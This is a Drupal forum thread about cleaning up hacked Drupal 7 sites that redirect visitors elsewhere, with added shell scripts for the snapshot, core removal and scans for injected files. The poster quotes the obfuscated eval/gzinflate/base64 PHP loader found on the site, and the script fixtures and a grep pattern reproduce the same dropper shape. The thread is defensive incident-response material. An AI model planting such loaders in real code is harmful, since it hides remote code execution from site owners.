Hello,
I just visited my site and it takes me to a third-party site. This is the third-party site address it takes me to: http://tracesmodern.tk/?number=855-257-7118. I have 3 sites in the account and all have the same problem.
After I try a few times, I can visit my site. I talked to the hosting company. They want me to buy website security, which I can't afford right now. They want me to delete the malware code because they said the site was hacked in the first week of February. I am not sure where to start or which code to delete. Automatic update was on, and I am not sure why Drupal itself did not prevent it. How can I delete the malware code?
I will have to search for a backup from before February. I have had these sites for a few years. This is the first time I have had this issue.
The Drupal version is 7.22. I guess that also needs to be updated.
Thanks.
Comments
Once your site is hacked, they install 'backdoors', which can be hard to find. Backdoors are ways to get back into your site even if you remove the original vulnerability.
Your best bet, though unfortunate, will be if you can find a database backup from before it got hacked. Then you will want to do the following:
1) First make a copy of your existing database, and your file system. Even though these are hacked, you want to be able to get back to this point in case you break things and make them worse.
2) Delete core: all files and folders other than the /sites folder.
3) Re-upload Drupal core. Use the newest version.
4) Delete all contributed modules and themes, and re-upload the newest versions of these modules and themes.
5) Go through any custom code (i.e. custom modules and/or themes) and look for any code that has been injected into the files.
6) Go through the files folders, both public and private, and look for any files that shouldn't be there. Delete any of these that you find.
7) Upload your pre-hack database backup to the database.
8) Run update.php
Note however that you're best off getting someone who knows Drupal quite well to do this. If you know it fairly well, and have done things like updates and writing code for your site, you should be able to do it, but if someone else has built your site, then you would probably be best off hiring someone to do this.
Contact me to contract me for D7 -> D10/11 migrations.
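As an added example that is not part of Jaypan's comment, the script below does the file-system side of steps 1, 2 and 6 in POSIX shell: archive the docroot, delete everything except sites/, and list scripts sitting in upload directories. It assumes a Drupal 7 layout (a docroot holding index.php, modules/ and sites/) and, when run with --demo, builds a small constructed tree to operate on. The database dump in step 1 and the clean re-upload of core, modules and themes in steps 3 and 4 are done by hand outside it.

```shell
#!/bin/sh
# Added example, not a script from Jaypan's comment: the file-system half
# of the steps above (1: snapshot, 2: delete everything except /sites,
# 6: find uploads that are really scripts). The database dump of step 1
# and the clean re-upload of core, modules and themes in steps 3-4 are
# done outside this script. Paths and the sample tree are constructed.
set -u

# Step 1 (files): archive the whole docroot, dotfiles included, before
# touching anything, so the compromised state can be restored or studied.
snapshot_site() {   # snapshot_site DOCROOT ARCHIVE.tgz
  tar -czf "$2" -C "$1" .
}

# Step 2: remove every top-level entry except sites/. Core is then
# re-uploaded from a fresh download of the current release, so anything
# injected into index.php, .htaccess, includes/ or modules/ goes with it.
strip_core_keep_sites() {   # strip_core_keep_sites DOCROOT
  for p in "$1"/* "$1"/.[!.]*; do
    [ -e "$p" ] || continue              # an unmatched glob stays literal
    case "${p##*/}" in
      sites) ;;                          # keep settings.php, uploads, custom code
      *) rm -rf "$p" ;;
    esac
  done
}

# Step 6: an upload directory holds documents and images, never PHP. Lists
# scripts under sites/*/files and, if given, the private files directory.
list_foreign_uploads() {   # list_foreign_uploads DOCROOT [PRIVATE_DIR]
  find "$1/sites" -path '*/files/*' -type f \
       \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' -o -name '*.phar' \)
  if [ $# -ge 2 ] && [ -d "$2" ]; then
    find "$2" -type f \
       \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' -o -name '*.phar' \)
  fi
}

# Constructed docroot with the shapes the steps refer to (core files, a
# dotfile, settings.php, a custom module, an image and a planted script).
make_fixture() {   # prints DOCROOT
  root=$(mktemp -d)
  mkdir -p "$root/modules/node" "$root/sites/default/files/pictures" \
           "$root/sites/all/modules/custom/mymod"
  echo '<?php // core front controller' > "$root/index.php"
  echo 'Options -Indexes'                 > "$root/.htaccess"
  echo '<?php // core module'             > "$root/modules/node/node.module"
  echo '<?php $databases = array();'      > "$root/sites/default/settings.php"
  echo '<?php function mymod_menu() {}'   > "$root/sites/all/modules/custom/mymod/mymod.module"
  echo 'PNG bytes would be here'          > "$root/sites/default/files/pictures/logo.png"
  # Dropper planted in the upload dir, same shape as the file posted further
  # down in this thread; the payload string is a dummy, not real data.
  echo '<?php $a = "ZHVtbXk="; eval(gzinflate(base64_decode($a)));' \
                                         > "$root/sites/default/files/pictures/guy.php"
  echo "$root"
}

# Run with --demo to walk the constructed tree; on a real site call the
# three functions against the live docroot instead.
if [ "${1:-}" = "--demo" ]; then
  root=$(make_fixture); archive="$root.tgz"
  snapshot_site "$root" "$archive"
  echo "snapshot: $archive"
  echo "scripts in upload dirs:"; list_foreign_uploads "$root"
  strip_core_keep_sites "$root"
  echo "left after stripping core:"; find "$root" -type f | sort
fi
```

Run the snapshot first and keep the archive off the web root; only after it exists should strip_core_keep_sites touch the live tree, since the glob removes .htaccess and every core directory in one pass.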
site hacking
If a site is hacked, some things have to have happened before: weak passwords, poor hosting, themes and plugins that have not been updated for years. All of these are prerequisites for a hacker attack. If you leave the door open, the thieves will enter your house, right? Update the site to the latest version, update your theme and plugins, change your passwords to reliable ones, change your hosting provider to a reliable one, and you will not have similar issues.
Thanks for your answers.
I had 4 Drupal sites and all got hacked. I had other folders not related to Drupal. Those were untouched by the hackers.
I have done the following so far.
1. I changed the Drupal and database passwords for all of them.
2. These were old sites. I don't check them regularly. I could not find a backup for any of them. The hosting company keeps the last 30 days of backups. I restored all sites from the 30-day-old backup. Fewer files were infected 30 days ago than today.
3. I saw multiple PHP files. Below is the content of one file. I deleted all of them wherever I saw them.
<?php eval("\n\$dgreusdi = intval(__LINE__) * 337;");$a = "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";$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));
4. The Configuration page shows a warning to update Drupal security. Updated everything for all sites.
I visited all sites in different browsers. I did not see any sites forwarding to external sites. I don't know if the problems were definitely fixed. If I see the same issues later, I will follow the step-by-step guide given by Jaypan. Is there any sort of scanning I can do which will generate a report for me with the list of files which were injected? Or perhaps can I search for the text "base64" in the entire file system?
Thanks again.
Thank you @Jaypan for writing these helpful steps.
I would like to mention an important note before deleting the suspected files: you may look for all files that have been updated on the same date as the creation/last-update date of the suspected files. Use this Unix command:
I found some common code parts that might be useful for checking your folders for suspected files on your hacked website:
At the end, make sure to have a look at any PHP file containing eval() and make sure it's a regular file:
You might need to change some of these search terms to have an in-depth look.
Note: this will not catch the backdoors 100%. You still have to follow @Jaypan's steps.
Good luck!
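The commands this comment refers to did not survive on this page. As an added example that is not the commenter's own, the script below implements the three checks described: a grep over the usual obfuscation markers, a listing of files modified on the same day as a known-bad file, and a way to separate eval()/base64_decode() hits that are byte-identical to a clean copy of the release from those that are not. It assumes a Drupal docroot plus a fresh download of the same Drupal and contrib release for comparison; the marker list is a general choice, and the sample tree, file names and timestamps are constructed for the demo.

```shell
#!/bin/sh
# Added example, not the commands from the comment above (those did not
# survive on this page): three checks over a Drupal docroot. The marker
# list is the usual obfuscation vocabulary (eval, base64_decode,
# gzinflate, gzuncompress, str_rot13, preg_replace with /e); the sample
# tree, file names and timestamps are constructed for the demo.
set -u

MARKERS='eval[[:space:]]*\(|base64_decode[[:space:]]*\(|gzinflate[[:space:]]*\(|gzuncompress[[:space:]]*\(|str_rot13[[:space:]]*\(|preg_replace[[:space:]]*\(.*/e'

# Check 1: PHP sources anywhere in the tree (core, contrib, custom and the
# upload dirs) that contain an obfuscation marker. Prints file names only;
# a few legitimate core/contrib files also call base64_decode, so every
# hit still needs a look (check 3 removes the known-good ones).
scan_markers() {   # scan_markers DOCROOT
  find "$1" -type f \( -name '*.php' -o -name '*.module' -o -name '*.inc' \
       -o -name '*.install' -o -name '*.theme' -o -name '*.engine' \) \
       -exec grep -lE "$MARKERS" {} + 2>/dev/null | sort
}

# Check 2: everything modified on the same calendar day as a confirmed bad
# file (take the day from ls -l of that file, as YYYYMMDD). A dropper and
# the files it edited in the same run usually share a day, while untouched
# code keeps its release-time mtime. POSIX find has no date literal, so two
# temporary marker files bracket the day.
modified_on_day() {   # modified_on_day DOCROOT YYYYMMDD
  lo=$(mktemp); hi=$(mktemp)
  touch -t "${2}0000" "$lo"
  touch -t "${2}2359" "$hi"
  find "$1" -type f -newer "$lo" ! -newer "$hi" | sort
  rm -f "$lo" "$hi"
}

# Check 3: drop marker hits that are byte-identical to the same path in a
# fresh download of the same Drupal/contrib release. What is left is
# either your own custom code or injected code, and both are short lists.
hits_not_in_clean_copy() {   # hits_not_in_clean_copy DOCROOT CLEAN_ROOT
  scan_markers "$1" | while read -r f; do
    rel=${f#"$1"/}
    if [ -f "$2/$rel" ] && cmp -s "$f" "$2/$rel"; then
      continue                           # identical to the clean release: fine
    fi
    echo "$f"
  done
}

# Constructed live tree plus a clean copy of "the same release" beside it.
make_fixture() {   # prints DOCROOT; the clean copy is DOCROOT.clean
  root=$(mktemp -d); clean="$root.clean"
  mkdir -p "$root/modules/node" "$root/modules/system" "$root/sites/default/files" \
           "$clean/modules/node" "$clean/modules/system"
  # Legitimate base64_decode use, identical in both trees (stand-in for core).
  printf '<?php\nfunction system_decode($s) { return base64_decode($s); }\n' \
      > "$clean/modules/system/system.module"
  cp "$clean/modules/system/system.module" "$root/modules/system/system.module"
  # Core file that is clean in the release but got a line appended on the live site.
  printf '<?php\nfunction node_load($nid) { return $nid; }\n' > "$clean/modules/node/node.module"
  printf '<?php\nfunction node_load($nid) { return $nid; }\neval(gzinflate(base64_decode("ZHVtbXk=")));\n' \
      > "$root/modules/node/node.module"
  # Dropper in the upload dir, same shape as the file posted in this thread
  # (the payload string is a dummy, not real data).
  printf '<?php $a = "ZHVtbXk="; eval(gzinflate(base64_decode($a)));\n' > "$root/sites/default/files/guy.php"
  # Timestamps: the two injected files share a day; the clean files are months older.
  touch -t 202402030412 "$root/modules/node/node.module" "$root/sites/default/files/guy.php"
  touch -t 202309010000 "$root/modules/system/system.module" \
        "$clean/modules/system/system.module" "$clean/modules/node/node.module"
  echo "$root"
}

# Run with --demo to see the three checks on the constructed tree. On a real
# site: scan_markers /path/to/docroot; hits_not_in_clean_copy /path/to/docroot
# /path/to/fresh-download; modified_on_day /path/to/docroot 20240203.
if [ "${1:-}" = "--demo" ]; then
  root=$(make_fixture)
  echo "marker hits:";            scan_markers "$root"
  echo "hits not in clean copy:"; hits_not_in_clean_copy "$root" "$root.clean"
  echo "modified on 2024-02-03:"; modified_on_day "$root" 20240203
fi
```

On shared hosting without a shell, download the docroot and a fresh copy of the same release to a local machine and run the checks there. Treat the output as a worklist, not a verdict: a file that survives check 3 is either custom code you recognise or something to remove, and the same-day list from check 2 is where the edits made alongside a known dropper tend to show up.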
That's a nice set of added comments. That should help someone in the future for sure.
My site is on shared hosting. I am not sure how to run Unix commands there. Some details would help. If not, I will Google to see if I can find anything.
You can try to download your project to your machine, then try to find the affected files and remove them from your host.
Also, running some scan-check scripts might help.
guy.php in drupal 8
and I cannot update D8 core
after 1 year of no maintenance or updates .... >>> SOLVED: default.settings.php and settings.php must be updated
hi my site hacked
Hi, my site is hacked, my version is 8.
Please help me.
Update your drupal
Search for and destroy the backdoor file, and update your Drupal.